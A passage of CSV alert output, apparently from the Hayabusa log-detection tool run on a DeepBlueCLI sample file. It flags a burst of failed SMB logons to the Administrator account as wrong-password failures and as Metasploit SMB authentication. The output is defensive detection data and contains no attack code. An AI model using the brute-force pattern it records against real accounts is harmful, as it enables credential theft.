NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
